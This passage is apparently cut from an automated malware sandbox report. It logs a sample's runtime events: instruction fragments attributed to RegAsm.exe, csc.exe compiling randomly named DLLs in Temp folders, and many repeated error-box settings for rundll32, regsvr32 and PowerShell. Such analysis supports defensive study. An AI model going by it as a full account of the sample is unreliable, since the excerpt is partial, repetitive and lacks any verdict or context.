            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010ACDB3 push ss; retf 41_2_010ACDB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010ACCF6 push ss; retf 41_2_010ACDB2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010ED220 push eax; iretd 41_2_010ED221
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010ED238 push eax; iretd 41_2_010ED239
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_0110E924 push edx; iretd 41_2_0110EA22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_0110CF54 push eax; iretd 41_2_0110CF55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_0110FFDA push eax; ret 41_2_01110119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_0110FE5D push eax; ret 41_2_01110119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_011137C1 pushad ; retf 41_2_011137DF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_0110CF68 push 680110CFh; iretd 41_2_0110CF6D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010FCEB7 push eax; iretd 41_2_010FCF65
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.dll
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX (26 consecutive identical entries)
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX (20 consecutive identical entries)
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
